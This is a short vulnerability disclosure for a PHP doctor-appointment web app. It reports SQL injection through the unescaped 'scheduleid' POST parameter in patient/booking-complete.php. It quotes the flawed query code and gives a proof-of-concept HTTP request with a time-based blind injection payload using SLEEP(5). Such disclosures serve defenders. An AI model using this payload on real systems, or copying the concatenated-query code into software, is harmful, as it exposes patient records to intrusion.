Found a vulnerability

[0clickjacking0]

Vulnerability file address

patient/booking-complete.php from line 27,The $scheduleid parameter is controllable, the parameter scheduleid can be passed through post, and the $scheduleid is not protected from sql injection, line 34 $result= $database->query($sql2); causes sql injection

......
......
......
if($_POST){
        if(isset($_POST["booknow"])){
            $apponum=$_POST["apponum"];
            $scheduleid=$_POST["scheduleid"];
            $date=$_POST["date"];
            $scheduleid=$_POST["scheduleid"];
            $sql2="insert into appointment(pid,apponum,scheduleid,appodate) values ($userid,$apponum,$scheduleid,'$date')";
            $result= $database->query($sql2);
            //echo $apponom;
            header("location: appointment.php?action=booking-added&id=".$apponum."&titleget=none");

        }
    }
......
......
......

POC

POST /patient/booking-complete.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=u44s5v8gjuhqo5508209d5nnm1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

booknow=1&apponum=5&scheduleid=1&date=2022-08-05&scheduleid=2 AND (SELECT 7093 FROM (SELECT(SLEEP(5)))RWzN)

Attack results pictures